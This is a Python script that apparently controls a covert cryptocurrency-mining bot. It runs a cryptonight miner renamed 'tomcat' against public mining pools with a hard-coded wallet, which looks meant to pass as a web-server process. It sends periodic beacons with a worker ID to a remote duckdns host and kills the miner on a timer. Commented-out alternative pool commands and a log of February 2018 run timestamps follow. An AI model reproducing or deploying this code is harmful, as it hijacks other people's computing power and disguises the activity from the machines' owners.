import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:06.621747
#2018-02-17 17:07:05.504923
#2018-02-17 18:55:05.651557
#2018-02-17 20:44:05.366636
#2018-02-17 22:31:03.853484
#2018-02-18 00:13:07.105699
#2018-02-18 02:04:07.424660
#2018-02-18 03:53:01.232380
#2018-02-18 05:39:06.580190
#2018-02-18 07:32:02.174230
#2018-02-18 09:20:01.327291
#2018-02-18 11:06:03.402602
#2018-02-18 12:53:05.156732
#2018-02-18 14:40:08.527237
#2018-02-18 16:30:07.090872
#2018-02-18 18:19:04.770319
#2018-02-18 20:05:05.443428
#2018-02-18 21:51:06.024651
#2018-02-18 23:40:07.440839
#2018-02-19 01:26:01.558691
#2018-02-19 03:14:06.119911
#2018-02-19 04:59:05.892293
#2018-02-19 06:43:05.361562
#2018-02-19 08:34:02.039371
#2018-02-19 10:22:07.380602
#2018-02-19 12:10:10.539715
#2018-02-19 13:59:02.170841
#2018-02-19 15:48:07.906822
#2018-02-19 17:35:02.046562
#2018-02-19 19:24:06.503451
#2018-02-19 21:11:07.446033
#2018-02-19 22:58:06.081396
#2018-02-20 00:43:03.368012
#2018-02-20 02:33:05.755655
#2018-02-20 04:21:05.972940
#2018-02-20 06:05:07.234291
#2018-02-20 07:50:01.743075
#2018-02-20 09:35:06.903361
#2018-02-20 11:19:05.278676
#2018-02-20 13:06:01.924631
#2018-02-20 14:49:07.759107
#2018-02-20 16:33:06.436628
#2018-02-20 18:19:08.788881
#2018-02-20 20:11:01.851971
#2018-02-20 21:58:05.009956
#2018-02-20 23:39:01.340207
#2018-02-21 01:23:04.491347
#2018-02-21 03:11:05.259154
#2018-02-21 04:59:01.712929
#2018-02-21 06:47:06.371393
#2018-02-21 08:31:07.776013
#2018-02-21 10:17:02.066172
#2018-02-21 12:04:07.206680
#2018-02-21 13:52:07.210944
#2018-02-21 15:38:05.719802
#2018-02-21 17:28:01.468211
#2018-02-21 19:15:12.371965
#2018-02-21 21:04:01.483799
#2018-02-21 22:51:01.377002
#2018-02-22 00:40:05.466746
#2018-02-22 02:28:07.105869
#2018-02-22 04:15:02.001137
#2018-02-22 05:59:06.067118
#2018-02-22 07:46:09.063983
#2018-02-22 09:34:01.508071
#2018-02-22 11:18:04.852282
#2018-02-22 13:03:01.811314
#2018-02-22 14:50:07.057532
#2018-02-22 16:36:07.391800
#2018-02-22 18:25:10.285839
#2018-02-22 20:18:06.057136
#2018-02-22 22:05:01.739300
#2018-02-22 23:51:04.293415
#2018-02-23 01:39:01.713236
#2018-02-23 03:25:01.471066
#2018-02-23 05:10:09.140426
#2018-02-23 06:56:07.335132
#2018-02-23 08:45:06.434687
#2018-02-23 11:01:06.024830
#2018-02-23 12:56:07.190278
#2018-02-23 14:42:07.100937
#2018-02-23 16:30:06.692785
#2018-02-23 18:16:01.284352
#2018-02-23 20:00:10.283519
#2018-02-23 21:44:05.381280
#2018-02-23 23:40:09.741700
#2018-02-24 01:31:07.894573
#2018-02-24 03:20:09.065898
#2018-02-24 05:06:05.446931
#2018-02-24 06:55:08.094917
#2018-02-24 08:44:06.739011
#2018-02-24 10:38:07.355133
#2018-02-24 12:24:06.680043
#2018-02-24 14:18:06.475554
#2018-02-24 16:06:04.103211
#2018-02-24 17:57:05.064085
#2018-02-24 19:44:06.539325
#2018-02-24 21:30:08.873644
#2018-02-25 00:14:07.086542
#2018-02-25 04:08:02.249242
#2018-02-25 06:43:05.803371
#2018-02-25 11:38:07.142601
#2018-02-25 13:55:01.313285
#2018-02-25 15:29:01.212124